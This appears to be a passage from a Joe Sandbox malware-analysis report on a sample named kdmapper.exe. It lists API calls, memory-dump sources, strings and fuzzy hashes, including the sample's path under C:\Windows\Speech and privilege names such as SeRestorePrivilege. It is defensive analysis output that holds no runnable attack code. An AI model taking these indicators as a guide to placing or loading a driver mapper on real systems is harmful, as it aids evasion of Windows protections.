                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                                                                                              • API String ID: 2141747552-1753850145
                                                                                                                                                                                                              • Opcode ID: 125ce11418b835d30f1e43a10e51fa35f0f7b237b4a35ee216fb181cf3a9983f
                                                                                                                                                                                                              • Instruction ID: 68407ba5cdb05ed51736a879c4da712e9cca8407de6e9327c71fe40339946027
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 125ce11418b835d30f1e43a10e51fa35f0f7b237b4a35ee216fb181cf3a9983f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FFE04671950742AECB20AF3A9849B82BED5AF08700B18D82DE0DAB3641DAB5D5808B60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdjustPointer$_abort
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2252061734-0
                                                                                                                                                                                                              • Opcode ID: 20923ffffc06d93e0786ca7fedf703a67ca65a76814098741617dddb2604abd7
                                                                                                                                                                                                              • Instruction ID: 0bd0cc3a7e18de9e97b852abcfe64b5e044115614e0e358e085697aa77ad4b18
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20923ffffc06d93e0786ca7fedf703a67ca65a76814098741617dddb2604abd7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5251E171600212AFEB298F54D889BAAB3E4FF54314F24552EEE05A76E1E731EDC0D790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00E0BF39
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E0BF5C
                                                                                                                                                                                                                • Part of subcall function 00E08E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E0CA2C,00000000,?,00E06CBE,?,00000008,?,00E091E0,?,?,?), ref: 00E08E38
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E0BF82
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0BF95
                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E0BFA4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                                                              • Opcode ID: b80392f7b4493aff5bff0b17314aed1eeb4f1f469723c256a564ce2544412a92
                                                                                                                                                                                                              • Instruction ID: 24fed2e56b96f3cbf19debead3f3f9358083393e6e704a14b399140152353a24
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b80392f7b4493aff5bff0b17314aed1eeb4f1f469723c256a564ce2544412a92
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4801F7727022167FA7211AB75C4CCBB6A6EFFC2BA43145129F904F3281EF60CD4285B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00E21030,00000200,00E091AD,00E0617E,?,?,?,?,00DED984,?,?,?,00000004,00DED710,?), ref: 00E0986E
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E098A3
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E098CA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00E13A34,00000050,00E21030), ref: 00E098D7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00E13A34,00000050,00E21030), ref: 00E098E0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                              • Opcode ID: df1752a40a2167bd563c8b83615bcc9741a66234babda26c7a4c5481c470c27f
                                                                                                                                                                                                              • Instruction ID: 6c194cffb25fd93e7e09def1a43e320e1209df419ba0c8193500be2f37aea6f3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: df1752a40a2167bd563c8b83615bcc9741a66234babda26c7a4c5481c470c27f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 240144321017016FD21A2F35AC8599B26AEDBC27B4721A235F915B23D3EE308C864230
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00DF11CF: ResetEvent.KERNEL32(?), ref: 00DF11E1
                                                                                                                                                                                                                • Part of subcall function 00DF11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00DF11F5
                                                                                                                                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00DF0F21
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?), ref: 00DF0F3B
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00DF0F54
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00DF0F60
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00DF0F6C
                                                                                                                                                                                                                • Part of subcall function 00DF0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00DF1206,?), ref: 00DF0FEA
                                                                                                                                                                                                                • Part of subcall function 00DF0FE4: GetLastError.KERNEL32(?), ref: 00DF0FF6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1868215902-0
                                                                                                                                                                                                              • Opcode ID: 176baec01e07be67accbdad412c4ac5d757d3b1d599fd912d855eed638f8b5fa
                                                                                                                                                                                                              • Instruction ID: d8d15551adff91a6e3ee9242766cb50842d145aef99ef54a8a8bd6333a9c8a8c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 176baec01e07be67accbdad412c4ac5d757d3b1d599fd912d855eed638f8b5fa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12015E76500744EFC7229F65DC84BD6BBE9FF08710F008929F26AA2161CB757A58CA60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0C817
                                                                                                                                                                                                                • Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34), ref: 00E08DE2
                                                                                                                                                                                                                • Part of subcall function 00E08DCC: GetLastError.KERNEL32(00E13A34,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34,00E13A34), ref: 00E08DF4
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0C829
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0C83B
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0C84D
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0C85F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              • Opcode ID: 9216019e3d7706681bf9d5cd040d43a584fdd08b0487b48dc9ed9f491925c8dd
                                                                                                                                                                                                              • Instruction ID: df085ee7ce6991286c2c4fd329a242fb1828b0531f2ce45449627ff54df21fa0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9216019e3d7706681bf9d5cd040d43a584fdd08b0487b48dc9ed9f491925c8dd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66F04F32510202AFC624DF69F585C4A77EDAB00718764B919F548F76D2CA70FCC08A68
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DF1FE5
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DF1FF6
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DF2006
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DF2014
                                                                                                                                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00DEB371,?,?,00000000,?,?,?), ref: 00DF202F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$CompareString
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3397213944-0
                                                                                                                                                                                                              • Opcode ID: 4960c0a7e78b2c70fb7431e9bd00ba6f67d57fdb9fbbe2479316525bc2db0798
                                                                                                                                                                                                              • Instruction ID: 0f4ca17c0abbaea3d1210f8481a4234b2894c59b6f658ba31bf4d38b585c606c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4960c0a7e78b2c70fb7431e9bd00ba6f67d57fdb9fbbe2479316525bc2db0798
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F06D33008118BFCF225F61EC09DDA3F6AEB44760B11C005F61A6A0A2CB72D6A2D690
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFB579
                                                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB58A
                                                                                                                                                                                                              • IsDialogMessageW.USER32(00010420,?), ref: 00DFB59E
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00DFB5AC
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00DFB5B6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1266772231-0
                                                                                                                                                                                                              • Opcode ID: d285e7f67771a3c5b50f3426f04c0ce4ce9e617b899385ae33398361285f7e4f
                                                                                                                                                                                                              • Instruction ID: d085dce0393f91ec1a5a6c587589ff3e008c8bd2ca6d30fc2d3a1cd07349024f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d285e7f67771a3c5b50f3426f04c0ce4ce9e617b899385ae33398361285f7e4f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15F0D675A01119AF8B209BF6DC4CDEB7FBCDF063517044515B519E2150EB38D60ACBB0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _swprintf
                                                                                                                                                                                                              • String ID: %ls$%s: %s
                                                                                                                                                                                                              • API String ID: 589789837-2259941744
                                                                                                                                                                                                              • Opcode ID: 05e36623284fe5b6af8aae7e671f339a8941b9a264267147e89fbf90f6959ed8
                                                                                                                                                                                                              • Instruction ID: 4770c847b18165b38398c61d0254b00f23f515fec4582b073e745fb9908f91cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05e36623284fe5b6af8aae7e671f339a8941b9a264267147e89fbf90f6959ed8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A951DB3D24830CF6E62136948E46F357665EB05B44F26C506F3DEF84D1C9A2E450BB3A
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Speech\kdmapper.exe,00000104), ref: 00E07FAE
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E08079
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E08083
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                                              • String ID: C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                              • API String ID: 2506810119-2414484506
                                                                                                                                                                                                              • Opcode ID: 6ac8aa94ae1f68daa77bac3b72bc85c9497e8a4bc623d3484ad9557054fca400
                                                                                                                                                                                                              • Instruction ID: 9ab0ae0e3e84011d92cad803d5f6c8b3235a9ea42f370f6e8bdf3aaf907a41fa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ac8aa94ae1f68daa77bac3b72bc85c9497e8a4bc623d3484ad9557054fca400
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F31E270A00209AFDB21DF95DD8099EBBFCEF85300F1050AAF544B7291DB709E85CB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00E031FB
                                                                                                                                                                                                              • _abort.LIBCMT ref: 00E03306
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EncodePointer_abort
                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                              • API String ID: 948111806-2084237596
                                                                                                                                                                                                              • Opcode ID: ff46e065b4db9065a0124c80e302aca17463e986f3d83de8e2d1e2e6caebe209
                                                                                                                                                                                                              • Instruction ID: ac2930d5eedceb0ea138c9b39d7941aead85ec9e06318b7cd22952a61f047ff2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff46e065b4db9065a0124c80e302aca17463e986f3d83de8e2d1e2e6caebe209
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D415871900209AFCF15DFA4CD81AEEBBB9FF48308F189059FA04762A5D735AA90DB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00DE7406
                                                                                                                                                                                                                • Part of subcall function 00DE3BBA: __EH_prolog.LIBCMT ref: 00DE3BBF
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00DE74CD
                                                                                                                                                                                                                • Part of subcall function 00DE7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00DE7AAB
                                                                                                                                                                                                                • Part of subcall function 00DE7A9C: GetLastError.KERNEL32 ref: 00DE7AF1
                                                                                                                                                                                                                • Part of subcall function 00DE7A9C: CloseHandle.KERNEL32(?), ref: 00DE7B00
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                                                                              • API String ID: 3813983858-639343689
                                                                                                                                                                                                              • Opcode ID: cb778a6f63892b06ff9a159eba9d4d06fc6d952eecfc3fdadcfaad1274adc38d
                                                                                                                                                                                                              • Instruction ID: 9518dbae9049f63f3e8f0cc34c80a319e619924ae06486b17720cf2fa8e13550
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb778a6f63892b06ff9a159eba9d4d06fc6d952eecfc3fdadcfaad1274adc38d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4931C371D04298AEDF51FBA6DC45FEE7BB9EB19304F084055F405B7182C7748A848771
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                                                                                                                                                                • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00DFAD98
                                                                                                                                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00DFADAD
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00DFADC2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemText$DialogWindow
